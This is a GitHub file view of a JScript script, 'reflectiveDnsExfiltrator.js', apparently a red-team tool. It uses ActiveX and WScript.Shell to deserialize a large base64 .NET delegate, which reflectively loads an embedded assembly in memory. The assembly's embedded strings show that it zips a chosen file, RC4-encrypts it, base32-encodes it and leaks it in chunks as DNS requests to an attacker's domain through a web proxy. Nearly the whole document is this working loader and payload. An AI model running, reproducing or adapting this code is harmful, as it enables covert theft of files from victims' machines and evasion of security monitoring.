-
Notifications
You must be signed in to change notification settings - Fork 10
/
reflectiveDnsExfiltrator.js
275 lines (271 loc) · 19.3 KB
/
reflectiveDnsExfiltrator.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
function setversion() {
var shell = new ActiveXObject('WScript.Shell');
ver = 'v4.0.30319';
try {
shell.RegRead('HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\');
} catch(e) {
ver = 'v2.0.50727';
}
shell.Environment('Process')('COMPLUS_Version') = ver;
}
function debug(s) {}
function base64ToStream(b) {
var enc = new ActiveXObject("System.Text.ASCIIEncoding");
var length = enc.GetByteCount_2(b);
var ba = enc.GetBytes_4(b);
var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
ba = transform.TransformFinalBlock(ba, 0, length);
var ms = new ActiveXObject("System.IO.MemoryStream");
ms.Write(ba, 0, (length / 4) * 3);
ms.Position = 0;
return ms;
}
var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+
"AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+
"dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+
"ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+
"AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+
"RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+
"eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+
"cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+
"aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+
"MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+
"dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+
"ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+
"B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+
"dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+
"CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+
"SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+
"cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+
"AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+
"AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+
"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+
"NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+
"ZW1ibHkGFwAAAARMb2FkCg8MAAAAAC4AAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+
"YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAtA9WWgAAAAAA"+
"AAAA4AACIQsBCwAAJgAAAAYAAAAAAADeRAAAACAAAABgAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"+
"AAAAAAAAAKAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAjEQA"+
"AE8AAAAAYAAA6AIAAAAAAAAAAAAAAAAAAAAAAAAAgAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+
"AAAALnRleHQAAADkJAAAACAAAAAmAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAA6AIAAABg"+
"AAAABAAAACgAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAgAAAAAIAAAAsAAAAAAAAAAAA"+
"AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAMBEAAAAAAAASAAAAAIABQDcKgAAsBkAAAEAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKgIoBAAACgAA"+
"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"+
"BQAA6AUAACNTdHJpbmdzAAAAAJwLAABoCwAAI1VTAAQXAAAQAAAAI0dVSUQAAAAUFwAAnAIAACNC"+
"bG9iAAAAAAAAAAIAAAFXnQIoCQoAAAD6JTMAFgAAAQAAACUAAAAHAAAACAAAABAAAAAPAAAAOQAA"+
"AAMAAAAHAAAAAQAAAAkAAAACAAAAAQAAAAEAAAAEAAAAAgAAAAQAAAAAAAoAAQAAAAAABgBiAFsA"+
"BgDNALIABgBiAUIBBgCCAUIBBgDYAbkBBgDsAVsABgD+AVsABgArAlsABgA9AlsABgBmAlsABgB/"+
"AlsABgCZAo8CBgCqAo8CBgC9AlsABgAIA0IBBgAjA1sABgBeA0IBBgBtA1sABgBzA1sACgCuA6ID"+
"BgDCA48CDgDlA88DBgDwA48CDgD3A88DDgAGBM8DBgAnBI8CBgBHBFsABgBbBI8CBgB3BGsEEgC/"+
"BKwEEgDJBKwEBgDsBFsABgACBVsABgAvBR4FEgA8BawEBgBjBVsABgDHBWsEAAAAAAEAAAAAAAEA"+
"AQABABAAJwAnAAUAAQABAAEAEABAACcABQABAAcAAAEQAEsAJwAFAAIADQAAAAAAwwIAAAUABQAP"+
"ABMBAAAtAwAAQQAGAA8AAwEQAJ4FAAAFAAYADwARAGoF7gFRgO4ATwBRgPkATwBRgAUBXAATAUoD"+
"AwEGADYBOwIGADgBTwAGADoBTwBQIAAAAACGGGkACgABAFwgAAAAAJEAbwAOAAEA2CAAAAAAkQB6"+
"ABIAAQBQIQAAAACRAIUAFwACAHghAAAAAIYAjAAdAAMArCEAAAAAlgCUACIABAAQKAAAAACWAJkA"+
"KAAFAEQoAAAAAJEAoQAxAAcAWCkAAAAAkQDbADgACACcKQAAAACRAOkARwAKALgpAAAAAIYYaQAK"+
"AA0AMCgAAAAAkQBMBekBDQDAKQAAAACTABQBFwAOANQqAAAAAIYYaQAKAA8AwygAAAAAhhhpAAoA"+
"DwDMKAAAAACGALEFPwIPAAAAAQAjAQAAAQAoAQAAAQAtAQAAAQAtAQAAAQAyAQAAAgAoAQAAAQAy"+
"AQAAAQAyAQAAAgAoAQAAAQA2AQAAAgA4AQAAAwA6AQAAAQA4AQAAAQA8AQAAAQDFBRkAaQCgACEA"+
"aQAKACkAaQClAAkAaQAKADEA9AESADkACAKwADkAGgK1ADEA9AG5AEEAMgK/ADEASgLEAEEAXgLO"+
"AEEAawLYAEEAcQJcAEEAdwLkAFkAhwLpAGEAngLuAGkArwLzAEEAtgL4AHkAaQAKAIkAhgMHAaEA"+
"uQMPAakAaQAKALEAaQAgAbEAFgQpAckAIgQvAdEAaQA0AWkANAQ6AdEAQQRAAdkAUwQKALkAZgRG"+
"AekAgARNAekAiQRSAakAkgRYAUEAmgRdAUEAtgJhAUEApQRoAfEAaQBuAfEA1wR0AbkAQQR5AbkA"+
"4QSBAbkA5gQKAPEA5gQKAAEB9gS1AAkBBwWJAUEACwWPAXEAFQW1AEEApQSVAREBNgWcAaEAkgTT"+
"AaEAkQX7AQwAaQANAqEAlwUTAhQAaQANAikBaQCgAEEA1QVbAikB3wVgAgkAFQW1AAgACABSAAgA"+
"DABXAA4AEABfACEAmwD+AC4ACwB0Ai4AEwB9AkMAGwCqAKMAmwD+AOMAmwD+AIABmwD+AAEADAAA"+
"AAYAygDUAN8AoQHkAfcBMQJRAmcCBQJEAqAhAAAFAASAAAAAAAAAAAAAAAAAAAAAAKABAAAEAAAA"+
"AAAAAAAAAAABAFIAAAAAAAQAAAAAAAAAAAAAAAEAlgMAAAAABAAAAAAAAAAAAAAAAQDPAwAAAAAE"+
"AAAAAAAAAAAAAAABAFsAAAAAAAYABQAHAAMAKwAcAWMA4AFpACwCaQBMAgAAAAAAPE1vZHVsZT4A"+
"cmVmbGVjdGl2ZURuc0V4ZmlsdHJhdG9yLmRsbABSZWZsZWN0aXZlRG5zRXhmaWx0cmF0b3IAUkM0"+
"RW5jcnlwdABCYXNlMzIAbXNjb3JsaWIAU3lzdGVtAE9iamVjdAAuY3RvcgBQcmludFVzYWdlAFBy"+
"aW50Q29sb3IARW5jb2RlAEdvRmlnaHQATWFpbgBFbmNyeXB0AEVuY3J5cHRJbml0YWxpemUAU3lz"+
"dGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMASUVudW1lcmFibGVgMQBFbmNyeXB0T3V0cHV0AFN3YXAA"+
"SW5CeXRlU2l6ZQBPdXRCeXRlU2l6ZQBCYXNlMzJBbHBoYWJldABUb0Jhc2UzMlN0cmluZwB0ZXh0"+
"AGRhdGEAYXJncwBrZXkAcwBpAGoAYnl0ZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNl"+
"cwBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0"+
"cmlidXRlAHJlZmxlY3RpdmVEbnNFeGZpbHRyYXRvcgBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2Vy"+
"dmljZXMAQ29tVmlzaWJsZUF0dHJpYnV0ZQBDb25zb2xlAFdyaXRlTGluZQBBcHBEb21haW4AZ2V0"+
"X0N1cnJlbnREb21haW4AZ2V0X0ZyaWVuZGx5TmFtZQBTdHJpbmcAU3RhcnRzV2l0aABDb25zb2xl"+
"Q29sb3IAc2V0X0ZvcmVncm91bmRDb2xvcgBSZXBsYWNlAENoYXIAU3BsaXQARW1wdHkASW5kZXhP"+
"ZgBDb252ZXJ0AFRvSW50MzIAU3lzdGVtLklPAFBhdGgAR2V0RmlsZU5hbWUARmlsZQBFeGlzdHMA"+
"Rm9ybWF0AEludDMyADxQcml2YXRlSW1wbGVtZW50YXRpb25EZXRhaWxzPntENkE4MjE2MS1CRDhD"+
"LTRDNkQtQkRBQy02Mzk5NDJERTVERjl9AENvbXBpbGVyR2VuZXJhdGVkQXR0cmlidXRlAFZhbHVl"+
"VHlwZQBfX1N0YXRpY0FycmF5SW5pdFR5cGVTaXplPTEyACQkbWV0aG9kMHg2MDAwMDA2LTEAUnVu"+
"dGltZUhlbHBlcnMAQXJyYXkAUnVudGltZUZpZWxkSGFuZGxlAEluaXRpYWxpemVBcnJheQBTeXN0"+
"ZW0uQ29yZQBTeXN0ZW0uTGlucQBFbnVtZXJhYmxlAENvbnRhaW5zAE1lbW9yeVN0cmVhbQBTeXN0"+
"ZW0uSU8uQ29tcHJlc3Npb24AWmlwQXJjaGl2ZQBTdHJlYW0AWmlwQXJjaGl2ZU1vZGUAWmlwQXJj"+
"aGl2ZUVudHJ5AENyZWF0ZUVudHJ5AE9wZW4AQmluYXJ5V3JpdGVyAFJlYWRBbGxCeXRlcwBXcml0"+
"ZQBJRGlzcG9zYWJsZQBEaXNwb3NlAFNlZWtPcmlnaW4AU2VlawBTeXN0ZW0uVGV4dABFbmNvZGlu"+
"ZwBnZXRfVVRGOABHZXRCeXRlcwBUb0FycmF5AGdldF9MZW5ndGgAQ29uY2F0AFN5c3RlbS5OZXQu"+
"U29ja2V0cwBUY3BDbGllbnQATmV0d29ya1N0cmVhbQBHZXRTdHJlYW0AUmVhZABDbG9zZQBFeGNl"+
"cHRpb24AZ2V0X01lc3NhZ2UATWF0aABNaW4AU3Vic3RyaW5nAFRvU3RyaW5nAFN5c3RlbS5UaHJl"+
"YWRpbmcAVGhyZWFkAFNsZWVwAFNvY2tldEV4Y2VwdGlvbgA8RW5jcnlwdEluaXRhbGl6ZT5iX18w"+
"AEZ1bmNgMgBDUyQ8PjlfX0NhY2hlZEFub255bW91c01ldGhvZERlbGVnYXRlMQBSYW5nZQBTZWxl"+
"Y3QAPD5jX19EaXNwbGF5Q2xhc3MzADxFbmNyeXB0T3V0cHV0PmJfXzIAYgBTdHJpbmdCdWlsZGVy"+
"AGdldF9DaGFycwBBcHBlbmQAAAAADVUAcwBhAGcAZQA6AACAxXsAMAB9ACAAPABmAGkAbABlAD4A"+
"IAA8AGQAbwBtAGEAaQBuAE4AYQBtAGUAPgAgADwAcABhAHMAcwB3AG8AcgBkAD4AIAA8AHcAZQBi"+
"AFAAcgBvAHgAeQA+ACAAWwB0AD0AdABoAHIAbwB0AHQAbABlAFQAaQBtAGUAXQAgAFsAcgA9AHIA"+
"ZQBxAHUAZQBzAHQATQBhAHgAUwBpAHoAZQBdACAAWwBsAD0AbABhAGIAZQBsAE0AYQB4AFMAaQB6"+
"AGUAXQAAXwkAZgBpAGwAZQA6AAkACQBbAE0AQQBOAEQAQQBUAE8AUgBZAF0AIABUAGgAZQAgAGYA"+
"aQBsAGUAIAB0AG8AIABiAGUAIABlAHgAZgBpAGwAdAByAGEAdABlAGQALgAAgIMJAGQAbwBtAGEA"+
"aQBuAE4AYQBtAGUAOgAJAFsATQBBAE4ARABBAFQATwBSAFkAXQAgAFQAaABlACAAZABvAG0AYQBp"+
"AG4AIABuAGEAbQBlACAAdABvACAAdQBzAGUAIABmAG8AcgAgAEQATgBTACAAcgBlAHEAdQBlAHMA"+
"dABzAC4AAIClCQBwAGEAcwBzAHcAbwByAGQAOgAJAFsATQBBAE4ARABBAFQATwBSAFkAXQAgAFAA"+
"YQBzAHMAdwBvAHIAZAAgAHQAbwAgAHUAcwBlAGQAIABmAG8AcgAgAGUAbgBjAHIAeQBwAHQAaQBu"+
"AGcAIAB0AGgAZQAgAGQAYQB0AGEAIAB0AG8AIABiAGUAIABlAHgAZgBpAGwAdAByAGEAdABlAGQA"+
"LgAAgPEJAHcAZQBiAFAAcgBvAHgAeQA6AAkAWwBNAEEATgBEAEEAVABPAFIAWQBdACAAVABoAGUA"+
"IABwAHIAbwB4AHkAIABzAGUAcgB2AGUAcgAgAHQAbwAgAHUAcwBlACAAYQBzACAAYQAgAHIAZQBm"+
"AGwAZQBjAHQAaQB2AGUAIABEAE4AUwAgAHIAZQBzAG8AbAB1AHQAaQBvAG4AIABoAG8AcwB0ACwA"+
"IABpAG4AIAB0AGgAZQAgAGYAbwByAG0AIAA8AHAAcgBvAHgAeQBBAGQAZABlAHMAcwA6AHAAcgBv"+
"AHgAeQBQAG8AcgB0AD4ALgAAgKsJAHQAaAByAG8AdAB0AGwAZQBUAGkAbQBlADoACQBbAE8AUABU"+
"AEkATwBOAE4AQQBMAF0AIABUAGgAZQAgAHQAaQBtAGUAIABpAG4AIABtAGkAbABsAGkAcwBlAGMA"+
"bwBuAGQAcwAgAHQAbwAgAHcAYQBpAHQAIABiAGUAdAB3AGUAZQBuACAAZQBhAGMAaAAgAEQATgBT"+
"ACAAcgBlAHEAdQBlAHMAdAAuAACAxwkAcgBlAHEAdQBlAHMAdABNAGEAeABTAGkAegBlADoACQBb"+
"AE8AUABUAEkATwBOAE4AQQBMAF0AIABUAGgAZQAgAG0AYQB4AGkAbQB1AG0AIABzAGkAegBlACAA"+
"aQBuACAAYgB5AHQAZQBzACAAZgBvAHIAIABlAGEAYwBoACAARABOAFMAIAByAGUAcQB1AGUAcwB0"+
"AC4AIABEAGUAZgBhAHUAbAB0AHMAIAB0AG8AIAAyADUANQAgAGIAeQB0AGUAcwAuAACA5QkAbABh"+
"AGIAZQBsAE0AYQB4AFMAaQB6AGUAOgAJAFsATwBQAFQASQBPAE4ATgBBAEwAXQAgAFQAaABlACAA"+
"bQBhAHgAaQBtAHUAbQAgAHMAaQB6AGUAIABpAG4AIABjAGgAYQByAHMAIABmAG8AcgAgAGUAYQBj"+
"AGgAIABEAE4AUwAgAHIAZQBxAHUAZQBzAHQAIABsAGEAYgBlAGwAIAAoAHMAdQBiAGQAbwBtAGEA"+
"aQBuACkALgAgAEQAZQBmAGEAdQBsAHQAcwAgAHQAbwAgADYAMwAgAGMAaABhAHIAcwAuAAAHWwAh"+
"AF0AAAdbACsAXQAAB1sAKgBdAAADPQAAAQArWwAhAF0AIABNAGkAcwBzAGkAbgBnACAAYQByAGcA"+
"dQBtAGUAbgB0AHMAAEFbACEAXQAgAFcAZQBiACAAcAByAG8AeAB5ACAAYQByAGcAdQBtAGUAbgB0"+
"ACAAbQBhAGwAZgBvAHIAbQBlAGQAAC9bACEAXQAgAEYAaQBsAGUAIABuAG8AdAAgAGYAbwB1AG4A"+
"ZAA6ACAAewAwAH0AAAV0AD0AAEtbACoAXQAgAFMAZQB0AHQAaQBuAGcAIAB0AGgAcgBvAHQAdABs"+
"AGUAIAB0AGkAbQBlACAAdABvACAAWwB7ADAAfQBdACAAbQBzAAAFcgA9AABfWwAqAF0AIABTAGUA"+
"dAB0AGkAbgBnACAARABOAFMAIAByAGUAcQB1AGUAcwB0ACAAbQBhAHgAIABzAGkAegBlACAAdABv"+
"ACAAWwB7ADAAfQBdACAAYgB5AHQAZQBzAAAFbAA9AABTWwAqAF0AIABTAGUAdAB0AGkAbgBnACAA"+
"bABhAGIAZQBsACAAbQBhAHgAIABzAGkAegBlACAAdABvACAAWwB7ADAAfQBdACAAYwBoAGEAcgBz"+
"AABdWwAqAF0AIABDAG8AbQBwAHIAZQBzAHMAaQBuAGcAIAAoAFoASQBQACkAIAB0AGgAZQAgAFsA"+
"ewAwAH0AXQAgAGYAaQBsAGUAIABpAG4AIABtAGUAbQBvAHIAeQAAgL1bACoAXQAgAEUAbgBjAHIA"+
"eQBwAHQAaQBuAGcAIAB0AGgAZQAgAFoASQBQACAAZgBpAGwAZQAgAHcAaQB0AGgAIABwAGEAcwBz"+
"AHcAbwByAGQAIABbAHsAMAB9AF0ALAAgAHQAaABlAG4AIABjAG8AbgB2AGUAcgB0AGkAbgBnACAA"+
"aQB0ACAAdABvACAAYQAgAGIAYQBzAGUAMwAyACAAcgBlAHAAcgBlAHMAZQBuAHQAYQB0AGkAbwBu"+
"AABrWwAqAF0AIABUAG8AdABhAGwAIABzAGkAegBlACAAbwBmACAAZABhAHQAYQAgAHQAbwAgAGIA"+
"ZQAgAHQAcgBhAG4AcwBtAGkAdAB0AGUAZAA6ACAAWwB7ADAAfQBdACAAYgB5AHQAZQBzAACAlVsA"+
"KwBdACAATQBhAHgAaQBtAHUAbQAgAGQAYQB0AGEAIABlAHgAZgBpAGwAdAByAGEAdABlAGQAIABw"+
"AGUAcgAgAEQATgBTACAAcgBlAHEAdQBlAHMAdAAgACgAYwBoAHUAbgBrACAAbQBhAHgAIABzAGkA"+
"egBlACkAOgAgAFsAewAwAH0AXQAgAGIAeQB0AGUAcwAAN1sAKwBdACAATgB1AG0AYgBlAHIAIABv"+
"AGYAIABjAGgAdQBuAGsAcwA6ACAAWwB7ADAAfQBdAAA5SABFAEEARAAgAC8AIABIAFQAVABQAC8A"+
"MQAuADAADQAKAEgAbwBzAHQAOgAgAGkAbgBpAHQALgAAD3sAMAB9AHwAewAxAH0AAAMuAAAJDQAK"+
"AA0ACgAANVsAKgBdACAAUwBlAG4AZABpAG4AZwAgACcAaQBuAGkAdAAnACAAcgBlAHEAdQBlAHMA"+
"dAABT1sAIQBdACAAVQBuAGUAeABwAGUAYwB0AGUAZAAgAGUAeABjAGUAcAB0AGkAbwBuACAAbwBj"+
"AGMAdQByAGUAZAA6ACAAWwB7ADAAfQBdAAAnWwAqAF0AIABTAGUAbgBkAGkAbgBnACAAZABhAHQA"+
"YQAuAC4ALgAAL0gARQBBAEQAIAAvACAASABUAFQAUAAvADEALgAwAA0ACgBIAG8AcwB0ADoAIAAA"+
"FVsAKgBdACAARABPAE4ARQAgACEAAEFBAEIAQwBEAEUARgBHAEgASQBKAEsATABNAE4ATwBQAFEA"+
"UgBTAFQAVQBWAFcAWABZAFoAMgAzADQANQA2ADcAAAAAYSGo1oy9bUy9rGOZQt5d+QAIt3pcVhk0"+
"4IkDIAABAwAAAQQAAQEOBQABDh0FBCABAQ4FAAEBHQ4IAAIdBR0FHQUGAAEdBR0FDgACFRIJAQUd"+
